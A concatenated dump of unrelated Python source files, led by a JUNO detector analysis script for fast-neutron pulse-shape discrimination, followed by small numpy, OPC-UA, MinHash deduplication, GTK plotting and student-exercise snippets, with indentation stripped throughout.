vertex resolution with function position_smearing())
2. calculate time of flight:
2.1 for every photon, that hits a PMT (20inch and 3inch), take the PMT position (via PMT ID from file
PMT_position.root) and calculate the time-of-flight distance with the reconstructed position from above.
2.2 with the time-of-flight distance, calculate the time-of-flight of this photon from production to PMT by
considering an effective speed of light in the LS.
3. consider TTS of PMTs:
3.1 for every photon, that hits a PMT (20inch and 3inch), take the time resolution (sigma) of the PMT
(via PMT ID either from file PmtData.root for the 20inch PMTs or set TTS = 5 ns for 3inch PMTs.)
3.2 the TTS of the PMT is FWHM. Therefore calculate sigma from TTS (FWHM = 2*sqrt(2*ln(2)) * sigma).
3.3 smear hittime of detsim with gaussian of sigma (time resolution) around the value of detsim hittime to get
the smeared hittime
4. for every photon, calculate the 'real' hittime (= smeared hittime - time_of_flight) and store it in array
5. Do points 2. to 4. for every photon. Then you get the correct hittime of this event. Build histogram with
correct hittimes and save histogram value in txt file and display histogram in png file
In the second part of the script:
- use calculated pulse shapes of fast neutrons and
"""
import datetime
import ROOT
import sys
import NC_background_functions
import numpy as np
from matplotlib import pyplot as plt
import os
# get the date and time, when the script was run:
date = datetime.datetime.now()
now = date.strftime("%Y-%m-%d %H:%M")
""" set flag, if hittimes must be calculated or read from file: """
flag_read_hittime_from_file = True
""" define time window and bin width: """
# set time window of whole signal in ns:
min_time = -50
max_time = 2000
# set time in ns, where the prompt signal should be 0:
time_limit_prompt = 1000
# Set bin-width of hittime histogram in ns:
binwidth = 5.0
""" PSD parameter from analyze_PSD_cut_v2.py: """
# corresponding NC PSD suppression:
NC_suppression = 99.0
# tail_start in ns:
tail_start = 275.0
# tail stop in ns:
tail_stop = 600.0
# TTR value corresponding to the PSD cut:
TTR_cut = 0.01662
""" set cut parameters from analysis of NC events and IBD events: """
# cut-radius in mm:
radius_cut = 16000
# prompt energy cut in MeV:
E_prompt_min = 10.0
E_prompt_max = 100.0
# time cut in ns:
T_cut_min = 1000.0
T_cut_max = 1000000.0
# multiplicity:
multiplicity = 1
# delayed energy cut in MeV:
E_delayed_min_MeV = 1.80
E_delayed_max_MeV = 2.55
# distance cut in mm:
distance_cut = 500.0
# delayed volume cut in mm:
delayed_volume = 17700.0
# path, where root files of neutron simulation are saved:
input_path_neutron = "/local/scratch1/pipc51/astro/blum/conversion_nPE_MeV/neutron_output/"
# path, where TTR values of NC and IBD events, that pass all cuts, are stored:
input_path_TTR = ("/home/astro/blum/juno/atmoNC/data_NC/output_detsim_v2/DCR_results_{0:.0f}mm_{1:.0f}MeVto{2:.0f}MeV_"
"{3:.0f}nsto{4:.0f}ms_mult{5}_{6:.0f}keVto{7:.0f}keV_dist{8:.0f}mm_R{9:.0f}mm_PSD{10:.0f}/"
.format(radius_cut, E_prompt_min, E_prompt_max, T_cut_min, T_cut_max/1000000, multiplicity,
E_delayed_min_MeV*1000, E_delayed_max_MeV*1000, distance_cut, delayed_volume, NC_suppression))
# path, where hittime distributions (png and txt) are saved:
input_path_hittimes = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/"
# output_path_neutron = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/"
output_path_neutron = "/home/astro/blum/PhD/work/MeVDM_JUNO/fast_neutrons/DCR/"
""" analyze neutron hittime distribution for kinetic energy of 10 MeV and 100 MeV: """
# first file of neutron simulation:
first_file_neutron = 0
# last file of neutron simulation (100 corresponds to user_neutron_300_MeV_0.root, 200 corresponds to
# user_neutron_500_MeV_0.root and 299 corresponds to user_neutron_500_MeV_99.root):
last_file_neutron = 1099
# number of events per file:
number_evts_per_file = 10
# total number of neutron events (factor 2 for 10 MeV and 100 MeV):
number_evts_total = (last_file_neutron - first_file_neutron + 1) * number_evts_per_file
# preallocate number of events that are analyzed (pass volume cut):
number_analyzed = 0
# array, where TTR values of neutron events are saved:
array_TTR_neutron = []
# array, where prompt energy of neutron events is saved in MeV:
array_E_prompt_neutron = []
# number of neutron events, that pass the PSD cut:
number_neutron_after_PSD = 0
""" load position of the PMTs and corresponding PMT ID from file PMT_position.root: """
file_PMT_position = "/home/astro/blum/juno/atmoNC/PMT_information/PMT_position.root"
# array with PMT ID and corresponding x, y, z position in mm:
pmtID_pos_file, x_pos_pmt, y_pos_pmt, z_pos_pmt = NC_background_functions.get_pmt_position(file_PMT_position)
""" load 'time resolution' in ns of the 20 inch PMTs and corresponding PMT ID from file PmtData.root: """
file_PMT_time = "/home/astro/blum/juno/atmoNC/PMT_information/PmtData_old.root"
# array with PMT ID and corresponding sigma in ns:
pmtID_time_file, sigma_time_20inch = NC_background_functions.get_20inchpmt_tts(file_PMT_time)
# set TTS (FWHM) of the 3inch PMTs in ns:
tts_3inch = 5.0
# calculate time resolution (sigma) for the 3inch PMTs in ns:
sigma_time_3inch = tts_3inch / (2 * np.sqrt(2 * np.log(2)))
# set effective speed of light in the liquid scintillator in mm/ns (see page 12 of
# 20200111_zli_VertexReconstruction_page20.pdf in folder /home/astro/blum/PhD/paper/reconstruction/).
# The effective refraction index in LS depends on the TTS of the PMT (Hamamatsu with TTS ~ 2.7 ns,
# NNVT with TTS ~ 18 ns).
# for Hamamatsu and 3inch PMTs (TTS ~ 2.7 ns and 5 ns) use n_eff = 1.544 (c/n_eff = 299792458 m / 1.544 s
# = 194166100 * 10**(-6) mm/ns ~ 194.17 mm/ns):
c_effective_smallTTS = 194.17
# for MCP PMTs (TTS ~ 18 ns) use n_eff = 1.578 (c/n_eff = 299792458 m / 1.578 s = 189982546 * 10**(-6) mm/ns ~
# 189.98 mm/ns):
c_effective_largeTTS = 189.98
# if pulse shapes are not calculated already, read ROOT files and save pulse shape to txt file:
if not flag_read_hittime_from_file:
# loop over root files with neutron simulation:
for index in range(first_file_neutron, last_file_neutron + 1, 1):
# load user_neutron_{}.root file:
if index < 100:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_10_MeV_{0:d}.root".format(index))
elif 100 <= index < 200:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_100_MeV_{0:d}.root".format(index-100))
elif 200 <= index < 300:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_300_MeV_{0:d}.root".format(index-200))
elif 300 <= index < 1000:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_500_MeV_{0:d}.root".format(index-300))
elif 1000 <= index <= 1099:
rfile = ROOT.TFile(input_path_neutron + "user_neutron_1000_MeV_{0:d}.root".format(index-1000))
else:
print("--------------------------------- ERROR-------------------")
print(rfile)
# get the "evt"-TTree from the TFile:
rtree_evt = rfile.Get("evt")
# get geninfo tree from TFile:
rtree_geninfo = rfile.Get("geninfo")
# get prmtrkdep tree from TFile:
rtree_prmtrkdep = rfile.Get("prmtrkdep")
# get the number of events in the 'evt' Tree:
num_events_evt = rtree_evt.GetEntries()
# check number of events:
if num_events_evt != number_evts_per_file:
sys.exit("ERROR: number of events in root file ({0:d}) != {1:d}"
.format(num_events_evt, number_evts_per_file))
# loop over the events:
for event in range(num_events_evt):
""" check volume cut: """
# get current event in prmtrkdep tree:
rtree_prmtrkdep.GetEntry(event)
# get number of initial particles:
n_init_part = int(rtree_prmtrkdep.GetBranch('nInitParticles').GetLeaf('nInitParticles').GetValue())
if n_init_part != 1:
# check if there is just one initial positron:
sys.exit("ERROR: more than 1 initial particles in event {0:d}".format(event))
# get quenched deposited energy of the initial particle in MeV:
qedep_prmtrkdep = float(rtree_prmtrkdep.GetBranch("Qedep").GetLeaf("Qedep").GetValue())
# do qedep cut (qedep must be between 10 and 100 MeV):
if qedep_prmtrkdep < E_prompt_min:
continue
if qedep_prmtrkdep > E_prompt_max:
continue
# get current event in geninfo tree:
rtree_geninfo.GetEntry(event)
# get number of initial particles:
n_init_particles = int(rtree_geninfo.GetBranch('nInitParticles').GetLeaf('nInitParticles').GetValue())
if n_init_particles != 1:
# check if there is just one initial positron:
sys.exit("ERROR: more than 1 initial particles in event {0:d}".format(event))
# get initial x, y, z position:
x_init = float(rtree_geninfo.GetBranch('InitX').GetLeaf('InitX').GetValue())
y_init = float(rtree_geninfo.GetBranch('InitY').GetLeaf('InitY').GetValue())
z_init = float(rtree_geninfo.GetBranch('InitZ').GetLeaf('InitZ').GetValue())
# do vertex reconstruction with function position_smearing():
# Smear x,y and z position of the initial position (returns reconstructed position in mm):
x_reconstructed = NC_background_functions.position_smearing(x_init, qedep_prmtrkdep)
y_reconstructed = NC_background_functions.position_smearing(y_init, qedep_prmtrkdep)
z_reconstructed = NC_background_functions.position_smearing(z_init, qedep_prmtrkdep)
# calculate distance to detector center in mm:
r_reconstructed = np.sqrt(x_reconstructed**2 + y_reconstructed**2 + z_reconstructed**2)
# check if reconstructed position is within 17 m:
if r_reconstructed >= 17000.0:
continue
else:
number_analyzed += 1
""" calculate the photon emission time distribution (time of flight correction with reconstructed position
and time smearing with TTS for each hit): """
# get event of 'evt'-tree:
rtree_evt.GetEntry(event)
# get evtID of the tree and compare with event:
evt_id = int(rtree_evt.GetBranch('evtID').GetLeaf('evtID').GetValue())
if evt_id != event:
sys.exit("ERROR: evtID of tree ({0:d}) != {1:d}".format(evt_id, event))
# get number of photons of this event:
n_photons = int(rtree_evt.GetBranch('nPhotons').GetLeaf('nPhotons').GetValue())
# preallocate list, where corrected (real) hit-times are saved:
hittime_array = []
# loop over every photon in the event:
for index1 in range(n_photons):
# get number of pe per photon and check if it is equal to 1:
npe = int(rtree_evt.GetBranch('nPE').GetLeaf('nPE').GetValue(index1))
if npe != 1:
sys.exit("ERROR: more than one p.e. per photon in event {0:d}, file {1}".format(event, index))
# get the pmtID of the hit PMT:
pmtID = int(rtree_evt.GetBranch('pmtID').GetLeaf('pmtID').GetValue(index1))
""" time of flight correction: """
# get hittime of PMT from tree in ns:
hittime = float(rtree_evt.GetBranch('hitTime').GetLeaf('hitTime').GetValue(index1))
# get position of the PMT with specific pmtID (pmtID is ascending number from 0 to 17738
# (17739 large PMTs) and from 300000 to 336571 (36572 small PMTs)).
# For large PMTs -> For 20inch PMTs, the pmtID is equal to index of x,y,z_pos_pmt array.
# For small PMTs -> For 3inch PMTs, the pmtID - (300000 - 17739) is equal to index of
# x,y,z_pos_pmt array.
# check if PMT is 20 inch or 3inch (pmtID < 50000 means 20inch PMT):
if pmtID < 50000:
# 20inch PMT:
# get PMT position in mm from arrays:
x_pmt = x_pos_pmt[pmtID]
y_pmt = y_pos_pmt[pmtID]
z_pmt = z_pos_pmt[pmtID]
else:
# 3inch PMT:
# calculate index of pos_pmt array that correspond to pmtID of 3inch PMTs (for example:
# first small PMT: 300000-282261 = 17739, last small PMT: 336571-282261 = 54310)
index_3inch = pmtID - 282261
# get PMT position in mm from arrays:
x_pmt = x_pos_pmt[index_3inch]
y_pmt = y_pos_pmt[index_3inch]
z_pmt = z_pos_pmt[index_3inch]
# calculate distance between reconstructed position of event and position of PMT (in mm):
distance_tof = np.sqrt((x_reconstructed - x_pmt)**2 + (y_reconstructed - y_pmt)**2 +
(z_reconstructed - z_pmt)**2)
""" time resolution of PMT: """
# get time resolution of PMT with specific pmtID (pmtID is ascending number from 0 to 17738 (17739 large
# PMTs)) -> For 20inch PMTs, the pmtID is equal to index of sigma_time_20inch array.
# check if PMT is 20 inch or 3inch (pmtID < 50000 means 20inch PMT):
if pmtID < 20000:
# 20inch PMT:
# get time resolution (sigma) of PMT in ns from array:
sigma_pmt_1 = sigma_time_20inch[pmtID]
if sigma_pmt_1 < 3:
# Hamamatsu PMT:
# sigma = TTS / (2*np.sqrt(2*np.log(2))) -> TTS = 7 ns as edge between Hamamatsu and MCP
# -> sigma = 3 ns: Hamamatsu if sigma < 3 ns, MCP if sigma > 3 ns:
# For Hamamatsu PMTs use sigma_t / TTS of old PmtData_old.root file:
sigma_pmt = sigma_pmt_1
# Calculate time of flight in ns for the small TTS:
time_of_flight = distance_tof / c_effective_smallTTS
else:
# MCP PMT:
# do NOT use sigma_t / TTS from old PmtData_old.root file, because there the TTS is
# around 12 ns.
# Use TTS of 18 ns and calculate sigma_pmt:
TTS_MCP = 18.0
sigma_pmt = TTS_MCP / (2 * np.sqrt(2 * np.log(2)))
# Calculate time of flight in ns for the large TTS:
time_of_flight = distance_tof / c_effective_largeTTS
elif 20000 < pmtID < 40000:
# there are some PMTs with ID around 30000 (user_atmoNC_7.root, event=32: 30637, 30276, 30573,30561,
# 30377) -> PMTs with ID above 30000 are Water Pool PMTs!!
# go to next photon:
continue
else:
# 3inch PMT:
sigma_pmt = sigma_time_3inch
# Calculate time of flight in ns for the small TTS:
time_of_flight = distance_tof / c_effective_smallTTS
# consider time resolution of PMT by generating normal distributed random number with mu = hittime and
# sigma = sigma_pmt (only the hittime at the PMT must be smeared, not the time-of-flight):
hittime_tts = np.random.normal(hittime, sigma_pmt)
""" calculate the 'real' hittime of the photon in ns: """
hittime_real = hittime_tts - time_of_flight
# take only hittimes that are within time window specified by min_time and max_time:
if min_time <= hittime_real <= max_time:
# append real hittime to array:
hittime_array.append(hittime_real)
# build histogram, where hittimes are saved:
# set bin-edges of hittime histogram in ns:
bins_hittime = np.arange(min_time, max_time + binwidth, binwidth)
# build hittime histogram:
npe_per_hittime, bin_edges_hittime = np.histogram(hittime_array, bins_hittime)
# before saving the histogram of the hittimes check the reconstructed distance:
if r_reconstructed < radius_cut:
# event within 16 m:
event_position = 16
elif radius_cut <= r_reconstructed < 17000.0:
# event between 16 m and 17 m:
event_position = 17
""" save time distribution/ pulse shape to file: """
# save hittime distribution of the event to txt file:
# build list, where 0th entry is start-hittime in ns, 1st entry is last-hittime in ns, 2nd entry is
# binwidth in ns and the following entries are nPE of each hittime-bin of whole signal:
npe_per_hittime_save = [x_reconstructed, y_reconstructed, z_reconstructed]
npe_per_hittime_save.extend([min_time, max_time, binwidth])
npe_per_hittime_save.extend(npe_per_hittime)
np.savetxt(input_path_hittimes + "hittimes/file{0:d}_evt{1:d}_pulse_shape_R{2:d}.txt"
.format(index, event, event_position),
npe_per_hittime_save, fmt='%1.2f',
header="Pulse shape: Number of pe as function of the time "
"(time-of-flight correction and TTS smearing) of file user_neutron_{0:d}.root,"
"\nevent {1:d}, {2}:"
"\ntime window of pulse shape: from {3:.3f} ns to {4:.3f} ns with "
"bin-width = {5:0.3f} ns,"
.format(index, event, now, min_time, max_time, binwidth))
else:
# read pulse shapes for each event from txt file:
# loop over all files in folder input_path_neutron + "hittimes/", that start with 'file' and end with 'R16.txt'
# (files where hittime distribution is saved, each file is equal to one event):
for file_neutron in os.listdir(input_path_hittimes + "hittimes/"):
# if file_neutron.startswith("file") and file_neutron.endswith("R{0:d}.txt".format(int(radius_cut/1000.0))):
if file_neutron.startswith("file") and file_neutron.endswith("R{0:d}_DCR.txt".format(int(radius_cut/1000.0))):
# get the file name:
file_name_neutron = input_path_hittimes + "hittimes/" + file_neutron
# read txt file:
npe_from_file = np.loadtxt(file_name_neutron)
# get reconstructed position in mm:
x_reconstructed = npe_from_file[0]
y_reconstructed = npe_from_file[1]
z_reconstructed = npe_from_file[2]
# get min_time, max_time and binwidth from txt file and compare it with the values set above:
min_time_total_txt = npe_from_file[3]
if min_time != min_time_total_txt:
sys.exit("ERROR: min_time_total from file differ from the value set in script")
max_time_total_txt = npe_from_file[4]
if max_time != max_time_total_txt:
sys.exit("ERROR: max_time_total from file differ from the value set in script")
binwidth_txt = npe_from_file[5]
if binwidth != binwidth_txt:
sys.exit("ERROR: binwidth from file differ from the value set in script")
# the rest of pulse_shape_data_IBD is the hittime distribution histogram in nPE per bin. Take only the
# prompt signal defined by start_time and end_time:
nPE_per_bin = npe_from_file[6:(int((time_limit_prompt + binwidth + np.abs(min_time)) / binwidth)+3)]
# calculate the total number of PE of the prompt signal:
nPE_total = np.sum(nPE_per_bin)
# convert nPE_total to energy in MeV:
E_prompt = NC_background_functions.conversion_npe_to_evis(nPE_total)
# append E_prompt to array:
array_E_prompt_neutron.append(E_prompt)
# set the time window corresponding to nPE_per_bin:
time_window = np.arange(min_time, time_limit_prompt+binwidth, binwidth)
# get TTR and normalized pulse shape of neutron event:
TTR_neutron, npe_norm_neutron = NC_background_functions.pulse_shape(time_window, nPE_per_bin, tail_start,
tail_stop)
# check if ttr-value is not 0:
# if TTR_neutron == 0:
# continue
# increment number_analyzed:
number_analyzed += 1
# append TTR value to array:
array_TTR_neutron.append(TTR_neutron)
# check if event passes PSD cut:
if TTR_neutron <= TTR_cut:
# event passes PSD cut:
number_neutron_after_PSD += 1
print("energy of event that pass PSD cut = {0:.2f} MeV".format(E_prompt))
""" display energy of prompt signal in histogram: """
h3 = plt.figure(3, figsize=(11, 6))
binwidth_energy = 1.0
Bins_energy = np.arange(0.0, 200.0, binwidth_energy)
N_energy, bins_energy, patches = plt.hist(array_E_prompt_neutron, bins=Bins_energy, histtype="step", align='mid',
color="r", label="entries = {0:d}".format(len(array_E_prompt_neutron)))
plt.xlabel("Visible energy of prompt signal in MeV")
plt.ylabel("events per bin (bin width = {0:.1f} MeV)")
plt.title("Energy spectrum of prompt signal of simulated neutron events")
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "E_prompt_{0:.0f}MeVto{1:.0f}MeV_R{2:.0f}mm.png"
.format(min(Bins_energy), max(Bins_energy), radius_cut))
plt.close()
h4 = plt.figure(4)
plt.hist2d(array_E_prompt_neutron, array_TTR_neutron, bins=100)
plt.hlines(TTR_cut, xmin=min(array_E_prompt_neutron), xmax=max(array_E_prompt_neutron),
label="TTR cut value = {0:.5f}".format(TTR_cut))
plt.xlabel("visible energy of prompt signal in MeV")
plt.ylabel("TTR value for tail window from {0:.0f} ns to {1:.0f}".format(tail_start, tail_stop))
plt.title("TTR vs visible energy of simulated neutron events")
plt.grid()
plt.legend()
plt.savefig(output_path_neutron + "TTR_vs_Evis_{0:.0f}ns_{1:.0f}ns_R{2:.0f}mm.png".format(tail_start, tail_stop,
radius_cut))
plt.close()
# all neutron events within radius_cut and Qedep_prmtrkdep between 10 and 100 MeV are analyzed:
# calculate PSD neutron suppression:
PSD_neutron_suppression = 1.0 - float(number_neutron_after_PSD) / float(number_analyzed)
# print information about PSD efficiency of neutron events:
print("PSD cut: tail from {0:.0f} ns to {1:.0f} ns, TTR cut value = {2:.5f} (NC suppression {3:.0f} %)"
.format(tail_start, tail_stop, TTR_cut, NC_suppression))
print("number of analyzed neutron events:")
print(number_analyzed)
print("number of neutron events after PSD cut:")
print(number_neutron_after_PSD)
print("PSD neutron suppression in %:")
print(PSD_neutron_suppression * 100.0)
""" compare TTR values of neutron events with TTR values of NC and IBD events: """
# load TTR values of NC events that pass all cuts (before PSD):
array_TTR_NC = np.loadtxt(input_path_TTR + "TTR_IBDlike_NCevents_{0:.0f}ns_to_{1:.0f}ns.txt"
.format(tail_start, tail_stop))
array_TTR_IBD = np.loadtxt(input_path_TTR + "TTR_beforePSD_IBDevents_{0:.0f}ns_to_{1:.0f}ns.txt"
.format(tail_start, tail_stop))
# check, how many NC events pass the PSD cut:
number_NC_after_PSD = 0
for index2 in range(len(array_TTR_NC)):
if array_TTR_NC[index2] <= TTR_cut:
number_NC_after_PSD += 1
# calculate PSD NC suppression:
PSD_NC_suppression = 1.0 - float(number_NC_after_PSD) / float(len(array_TTR_NC))
# check, how many IBD events pass the PSD cut:
number_IBD_after_PSD = 0
for index2 in range(len(array_TTR_IBD)):
if array_TTR_IBD[index2] <= TTR_cut:
number_IBD_after_PSD += 1
# calculate PSD IBD suppression:
PSD_IBD_suppression = 1.0 - float(number_IBD_after_PSD) / float(len(array_TTR_IBD))
# display ttr-values for IBD, NC and fast neutron events for the given configuration:
h1 = plt.figure(1, figsize=(11, 6))
First_bin = 0.0
Last_bin = 0.05
Bin_width = (Last_bin-First_bin) / 200
Bins = np.arange(First_bin, Last_bin+Bin_width, Bin_width)
plt.hist(array_TTR_IBD, bins=Bins, histtype="step", align='mid', color="r",
label="prompt signal of IBD events after all cuts (entries = {0:d})".format(len(array_TTR_IBD)))
plt.hist(array_TTR_NC, bins=Bins, histtype="step", align='mid', color="b",
label="prompt signal of NC events that mimic IBD signal (entries = {0:d})".format(len(array_TTR_NC)))
plt.hist(array_TTR_neutron, bins=Bins, histtype="step", align='mid', color="g",
label="prompt signal of neutrons representing fast neutron events (entries = {0:d})"
.format(number_analyzed))
plt.xlabel("tail-to-total ratio")
plt.ylabel("events")
plt.title("Tail-to-total ratio of prompt signals of IBD, NC and fast neutron events" +
"\n(tail window {0:0.1f} ns to {1:0.1f} ns)".format(tail_start, tail_stop))
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "TTR_{0:.0f}_{1:.0f}nsto{2:.0f}ns_PosNCfastN_R{3:.0f}mm.png"
.format(NC_suppression, tail_start, tail_stop, radius_cut))
plt.close()
# display tot-values for positrons, NC and fast neutron events for the given configuration with efficiencies:
h2 = plt.figure(2, figsize=(11, 6))
First_bin = 0.0
Last_bin = 0.05
Bin_width = (Last_bin-First_bin) / 200
Bins = np.arange(First_bin, Last_bin+Bin_width, Bin_width)
n_pos_1, bins_pos_1, patches_pos_1 = plt.hist(array_TTR_IBD, bins=Bins, histtype="step", align='mid',
color="r", linewidth=1.5,
label="prompt signal of IBD events after all cuts "
"(entries = {0:d})".format(len(array_TTR_IBD)))
n_NC_1, bins_NC_1, patches_NC_1 = plt.hist(array_TTR_NC, bins=Bins, histtype="step", align='mid',
color="b", linewidth=1.5,
label="prompt signal of NC events that mimic IBD signal "
"(entries = {0:d})".format(len(array_TTR_NC)))
n_n_1, bins_n_1, patches_n_1 = plt.hist(array_TTR_neutron, bins=Bins, histtype="step", align='mid',
color="g", linewidth=1.5,
label="prompt signal of neutrons representing fast neutron "
"events (entries = {0:d})"
.format(number_analyzed))
plt.vlines(TTR_cut, 0, max(n_pos_1)+max(n_pos_1)/10, colors="k", linestyles="--",
label="$\\epsilon_{IBD}$ = "+"{0:0.2f} %\n".format(PSD_IBD_suppression * 100.0) +
"$\\epsilon_{NC}$ = "+"{0:0.2f} %\n".format(PSD_NC_suppression * 100.0) +
"$\\epsilon_{fastN}$ = "+"{0:0.2f} %\n".format(PSD_neutron_suppression * 100.0) +
"tot value = {0:.5f}".format(TTR_cut))
plt.xlabel("tail-to-total ratio")
plt.ylabel("events")
plt.title("Tail-to-total ratio of prompt signals of IBD, NC and fast neutron events" +
"\n(tail window {0:0.1f} ns to {1:0.1f} ns)".format(tail_start, tail_stop))
plt.legend()
plt.grid()
plt.savefig(output_path_neutron + "TTR_{0:.0f}_{1:.0f}nsto{2:.0f}ns_PosNCfastN_R{3:.0f}mm_efficiencies.png"
.format(NC_suppression, tail_start, tail_stop, radius_cut))
plt.close()
|
999,419 | a638b874d9f5a3eb463777041196f3e7b99d3b52 | import numpy as np
arr2d=np.array([[1,2,3 ],[4,5,6],[7,8,9]])
print(arr2d)
#print(arr2d[1][2])
#slices of 2d array
slice1=arr2d[0:2,0:2]
#print(slice1)
#arr2d[:2,1:]=15
#print(arr2d)
#using loops to index
arr_len=arr2d.shape[0]
for i in range(arr_len):
arr2d[i]=i
#print(arr2d)
#one more way of accesing the rows
print(arr2d[[0,1]])
print(arr2d[[1,0]]) |
999,420 | a4b426d481f1da01c9707ca659d968f1a97794cd | """Export resources."""
from .logging import LOGGER as logger
from .logging import config_logs
|
999,421 | 5d7bcc246f81228836f7d1baa730f032218b486c | from threading import Lock
from core.base.data.LSHBasedFixSizeHash import LSHBasedFixSizeHash
from datasketch import MinHash
from services.NLPService import NLPService
class DistinctTask:
_lock = Lock()
_instance = None
@classmethod
def instance(cls):
if cls._instance is None:
with cls._lock:
if cls._instance is None:
cls._instance = cls()
return cls._instance
def __init__(self):
self.data = LSHBasedFixSizeHash()
self.nlp_service = NLPService.instance()
def add(self, data, min_score=0.7):
docs = self.nlp_service.sentencesize(data)
words = [word for doc in docs for word in self.nlp_service.seg_words(doc)]
m = MinHash()
for word in words:
m.update(word.encode())
m_score = self.data.get_max_similar(m)
self.data.add(m)
if m_score > min_score:
return False
else:
return True
|
999,422 | 74074c63fdc7cd361802ac781bef241980a85946 | # -*- coding: utf-8 -*-
quant = int(input('Quantos elementos você quer? '))
lista = []
sompar = 0
somimpar = 0
qpar = 0
qimpar = 0
for i in range(0,quant,1):
lista.append(int(input('Digite o elemento: ')))
print(desvpad) |
999,423 | 7ef842725980207f1b21c62a9d1b7355138c6046 | from ast import walk, For
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), "..", "..")))
from testrunner import CodersLabTestSuite, CodersLabException, p, dedent
tc = CodersLabTestSuite("Kolejne potęgi")
@tc.test("Skrypt wypisuje zdania na ekranie", aborts=True)
def test_printing(invoke, stdout, **kwargs):
invoke()
tc.assert_print_called(stdout)
for num in range(11):
phrase = "2 do potęgi {} to {}".format(num, 2 ** num)
if phrase not in "".join(stdout).lower():
raise CodersLabException("Nie znaleziono frazy {}".format(p.b.get(phrase)))
@tc.test("Pętla for była użyta do wykonania zadania", aborts=True)
def test_for_used(ast, **kwargs):
for node in walk(ast):
if isinstance(node, For):
break
else:
raise CodersLabException(
"W zadaniu nie znaleziono pętli {}".format(p.b.get("for"))
)
tc.run()
|
999,424 | 6864de2e5057aeb328378ec94d3973146614f790 | """
Import CSV file module
"""
def parser():
return {
'help': 'Import Visual Genome into KGTK format'
}
def add_arguments(parser):
"""
Parse arguments
Args:
parser (argparse.ArgumentParser)
"""
parser.add_argument("-sgf", "--scene-graphs-file", action="store", type=str, dest="scene_graphs_file", required=True, help='scene graphs json file')
parser.add_argument("-rgf", "--region-graphs-file", action="store", type=str, dest="region_graphs_file", required=True, help='region graphs json file')
parser.add_argument("-asf", "--attribute-synsets-file", action="store", type=str, dest="attr_synsets_file", required=True, help='attribute synsets json file')
parser.add_argument("-e", "--header", action="store", type=str, dest="delimiter")
parser.add_argument( "-nc", "--node-columns", action="store", nargs="*", dest="NODE_COLS")
parser.add_argument("-ec", "--edge-columns", action="store", nargs="*", dest="EDGE_COLS")
def run(filename, delimiter):
# import modules locally
import socket
print(f'Now importing {filename} with a delimiter {delimiter} and header {header}')
|
999,425 | f277f92f010376d55f56bfc2a49dbccea25e22b8 | import os
from opcua import ua
from .base import BasicSystem
class FileSystem(BasicSystem):
ua_dir_type = 13353
ua_file_type = 11575
def __init__(self, data_handler, inputs=None, outputs=None, **kwargs):
BasicSystem.__init__(self, data_handler, inputs, outputs)
options = dict()
if 'options' in kwargs:
options = kwargs['options']
if 'dir' in options:
self.mnt_dir = os.path.abspath(options['dir'])
else:
self.mnt_dir = os.path.abspath('./mnt')
base_node = self.data_handler.get_node('Filesystem')
if not os.path.isdir(self.mnt_dir):
os.mkdir(self.mnt_dir)
self.mnt_node = base_node.add_object(ua.NodeId('/mnt', 26), 'mnt', objecttype=self.ua_dir_type)
self.recursive_file_list(self.mnt_dir, self.mnt_node)
def recursive_file_list(self, parent_path, parent_node):
for ent in os.listdir(parent_path):
ent_path = os.path.join(self.mnt_dir, ent)
print(ent_path)
rel_path = '/{}'.format(os.path.relpath(ent_path, os.path.abspath('.')))
if os.path.isfile(ent_path):
parent_node.add_object(ua.NodeId(rel_path, 26), ent, objecttype=self.ua_file_type)
elif os.path.isdir(ent_path):
ent_node = parent_node.add_object(ua.NodeId(rel_path, 26), ent, objecttype=self.ua_dir_type)
self.recursive_file_list(ent_path, ent_node)
def process(self):
pass
|
999,426 | 0fa2d55a64be00bcd4b533446fed4ddec3d045a3 | import threading
import base, gen
import gtk, gobject, cairo
import time
import config
gtk.gdk.threads_init()
class Line:
def __init__(self, h, begin, tam, cor):
self.altura = h
self.comeco = begin
self.tamanho = tam
self.r = cor[0]
self.g = cor[1]
self.b = cor[2]
cores = [(0.8, 0.0, 0.8),
(0.0, 0.0, 0.8),
(0.0, 0.8, 0.0),
(0.8, 0.0, 0.0),
(0.8, 0.8, 0.0),
(0.0, 0.8, 0.8),
(0.4, 0.4, 0.4)]
class Plot(base.Tela):
def __init__(self):
base.Tela.__init__(self)
self.set_r(gen.q, 0.2, 0.5)
def draw_seg(self, cr, line, time, flag):
cr.set_line_width(0.003)
cr.set_source_rgb(line.r, line.g, line.b)
cr.move_to(line.comeco, line.altura)
cr.line_to(line.comeco + line.tamanho, line.altura)
cr.stroke()
if not flag:
cr.set_source_rgb(line.r, line.g, line.b)
cr.move_to(line.comeco + line.tamanho, line.altura)
cr.select_font_face("Helvetica")
cr.set_font_size(0.02)
cr.rel_move_to(0, 0.03)
cr.show_text(time)
def set_r(self, l, o, q):
self.r = gen.f(l, o, q)
self.ta = time.time()
self.tacc = self.ta
self.lines = []
def draw(self, cr, width, height):
#print "Hmmm, ", self.data.r()
cr.set_source_rgb(1, 1, 1)
cr.rectangle(0, 0, width, height)
cr.fill()
cr.translate(0, 0)
cr.scale(width / 1.0, height / 1.0)
cr.push_group()
cor = (0.0, 0.0, 0.8)
if self.r.acoes:
p = self.r.acoes[0]
tempo, nome = p
#if len(self.r.acoes) == 1:
# print tempo, '!!'
# tempo -= 1.0
ordem = self.r.ordem[nome]
global cores
cor = cores[int(ordem)]
q = (ordem + 1) / (self.r.num + 1)
p = time.time()
t0 = (self.tacc - self.ta) / self.r.total
dt = (p - self.tacc) / self.r.total
#print nome, dt
line = Line(q, t0, dt, cor)
if time.time() < tempo + self.tacc:
#print self.t(), tempo, self.tacc
self.draw_seg(cr, line, '0', True)
else:
self.r.acoes.pop(0)
#print "%s, %s, %s, %s" % t0, dt,
self.lines.append((p - self.ta, line))
self.tacc += tempo
for line in self.lines:
self.draw_seg(cr, line[1], "%.2f" % line[0],
self.r.acoes)
cr.pop_group_to_source()
cr.paint()
plot = Plot()
def timeout():
plot.queue_draw()
return True
gobject.timeout_add(16, timeout)
base.main(plot, plot.set_r)
|
999,427 | efa3b0b338d4c1469cf18875d307f0d4c83f777e | import sys
import unittest
import testing_utilities as t_u
